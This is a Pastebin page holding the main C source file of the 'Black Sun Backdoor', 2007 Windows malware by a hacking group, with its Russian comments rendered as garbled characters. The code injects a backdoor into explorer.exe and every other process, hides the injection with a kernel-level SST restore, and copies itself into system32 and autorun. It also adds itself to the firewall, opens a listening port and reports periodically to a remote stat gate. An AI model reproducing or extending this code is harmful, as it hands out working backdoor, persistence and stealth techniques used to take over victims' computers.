Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * ---------------------------------------------------------------------
- * ____ _ _ _____
- * | _ \| | | | / ____|
- * | |_) | | __ _ ___| | _| (___ _ _ _ __
- * | _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
- * | |_) | | (_| | (__| < ____) | |_| | | | |
- * |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
- * Black Sun Backdoor v1.0 prebeta
- *
- * (x) Cytech 2007
- *
- * ---------------------------------------------------------------------
- * [blacksun.c]
- * main-ôóíêöèè :)
- * ---------------------------------------------------------------------
- * thnx to:
- * Cr4sh//0x48k, el-//0x48k, gorl, xhack//0x48k, Bill//TPOC
- * ---------------------------------------------------------------------
- */
- #include "headers.h"
- // ---------------------------------------------------------------------------------------
- // ýòà ôóíêöèÿ çàïóñêàåò ñïëàéñèíã âî âñåõ DLL çàðàæåííîãî ïðîöåññà è â ñàìîì ïðîöåññå
- // + ïîäãðóæàåò ìîäóëè áåç êîòîðûõ íè÷åãî ðàáîòàòü íå áóäåò (imagehlp.dll è îñòàëüíûå)
- // ---------------------------------------------------------------------------------------
- static DWORD WINAPI StealthMain(LPVOID lpParam)
- {
- LoadLibrary(KERNEL32_DLL); // 1
- LoadLibrary(ADVAPI32_DLL); // 2
- LoadLibrary(IMGHLP_DLL); // 3
- LoadLibrary(SHELL32_DLL); // 4
- LoadLibrary(WS2_32_DLL); // 5
- LoadLibrary(URLMON_DLL); // 6
- LoadLibrary(WININET_DLL); // 7
- LoadLibrary(WINMM_DLL); // 8
- LoadLibrary(USER32_DLL); // 9
- Stealth();
- return 0;
- }
- // -----------------------------------------------------------------------------------------
- // ýòîò êîä áóäåò èíæåêòèðîâàòüñÿ â explorer.exe è ïðåäñòàâëÿåò ñîáîé îñíîâíîå òåëî áýêäîðà
- // -----------------------------------------------------------------------------------------
- static DWORD WINAPI BackdoorMain(LPVOID lpParam)
- {
- HANDLE hBindBackdoorThread,
- hzDownloaderThread;
- StealthMain(NULL);
- #ifdef NETSHADD
- NetSHFirewallReg(); // ðåãàåìñÿ â netsh ôàéðå
- #endif NETSHADD
- InitWinSock2API(); // èíèöèàëèçèðóåì WinSock2 API
- // ñîçäàåì ïîòîê áýêäîðà
- hBindBackdoorThread = StartThread(Backdoor_Listen, (short)BINDPORT);
- while(TRUE)
- {
- // ïðîâåðÿåì êîííåêò ê èíòåðíåòó... åñëè íåò, òî ñïèì 1 ìèíóòó è ïðîâåðÿåì ñíîâà
- if (CheckInternetConnection() == 0)
- {
- Sleep(1*60*1000);
- continue;
- }
- // åñëè ïîäêëþ÷åíû, òî ñîçäàåì ïîòîê îòïðàâêè èíôû íà ãåéò, çàòåì ñïèì óêàçàííîå âðåìÿ
- // (ïî óìîë÷àíèþ 15 ìèíóò), çàòåì ïðîäîëæàåì â òîì æå äóõå
- else if (CheckInternetConnection() == 1)
- {
- #ifdef USEGATE
- hzDownloaderThread = StartThread(ReportToStat, NULL);
- #endif USEGAGE
- Sleep(HTTPFREQ*60*1000);
- }
- }
- return TRUE;
- }
- // ---------------------------------------------------------------------------------------
- // òðåä äëÿ èíæåêòà â explorer.exe
- // ---------------------------------------------------------------------------------------
- DWORD WINAPI StartExplorerInjThread(LPVOID lParam)
- {
- StartProcInject(NULL, FIRSTINJPROC, BackdoorMain);
- return 0;
- }
- // ---------------------------------------------------------------------------------------
- // òðåä äëÿ èíæåêòà âî âñå ïðîöåññû
- // ---------------------------------------------------------------------------------------
- DWORD WINAPI StartAllProcInjThread(LPVOID lParam)
- {
- InjectAllProcesses(StealthMain);
- return FALSE;
- }
- // ---------------------------------------------------------------------------------------
- // ãîï-ñòîï... ìû ïîäîøëè èç-çà óãëà :D
- // ---------------------------------------------------------------------------------------
- int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
- {
- HANDLE hExplorerInj,
- hAllProcInj;
- __try
- {
- PDWORD deadcoded = 0;
- *deadcoded = 0xd34dc0d3d;
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- // âîññòàíàâëèâàåì SST, ÷òîáû íå ñïàëèòü èíæåêò.
- // çà ýòó ôè÷ó ïðåæäå âñåãî ñòîèò ïîáëàãîäàðèòü Cr4sh :)
- ReadSST((PDWORD)&sst);
- CallR0((DWORD)&R0Func);
- //ïðîïèñûâàåìñÿ â àâòîçàãðóçêó (run) è êîïèðóåìñÿ system32
- AddSelfToRun("addtorun");
- // ïîçâîëÿåì çàïóñòèòüñÿ òîëüêî 1 êîïèè òðîÿíà ñ ïîìîùüþ ñîçäàíèÿ mutex
- CreateMutex(NULL,FALSE, MUTEXNAME);
- // åñëè mutex óæå ñîçäàí, òî âûðóáàåìñÿ (çíà÷èò ìû óæå íå ïåðâûå)
- if(GetLastError() == ERROR_ALREADY_EXISTS)
- {
- ExitProcess(0);
- }
- // èíæåêòèðóþ êîä áýêäîðà â FIRSTINJPROC òåïåðü ðàáîòàåì èç ïîä åãî èìåíè.
- hExplorerInj = StartThread(StartExplorerInjThread, NULL);
- // çàðàæàþ âñå îñòàëüíûå ïðîöåññû.
- hAllProcInj = StartThread(StartAllProcInjThread, NULL);
- }
- return 0;
- }
- // -------------------------------------------------------------//
- // Darkcoded by Cytech/0x48k, (x) 2007, hellknights.void.ru //
- // -------------------------------------------------------------//
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement